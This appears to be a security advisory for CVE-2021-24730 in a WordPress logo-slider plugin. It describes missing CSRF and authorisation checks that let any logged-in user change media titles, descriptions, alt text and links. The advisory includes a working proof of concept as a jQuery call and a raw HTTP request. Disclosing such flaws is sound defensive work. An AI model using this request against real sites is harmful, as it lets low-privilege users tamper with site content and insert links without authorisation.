Logo Showcase with Slick Slider < 1.2.5 – Subscriber+ Arbitrary Media Title/Description/Alt Text/URL Update | CVE 2021-24730

Description

The plugin does not have CSRF and authorisation checks in the lswss_save_attachment_data AJAX action, allowing any authenticated users, such as Subscriber, to change title, description, alt text, and URL of arbitrary uploaded media.

Proof of Concept

jQuery.post(ajaxurl,{
action: "lswss_save_attachment_data",
attachment_id: 564,
form_data: "lswss_attachment_title=Test&lswss_attachment_desc=Changed%20by%20subscriber&lswss_attachment_alt=Alt%20text&lswss_attachment_link="
})

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 213
Connection: close
Cookie: [any authenticated user]

action=lswss_save_attachment_data&attachment_id=2133&form_data=lswss_attachment_title%3DTest%26lswss_attachment_desc%3DChanged%2520by%2520subscriber%26lswss_attachment_alt%3DAlt%2520text%26lswss_attachment_link%3D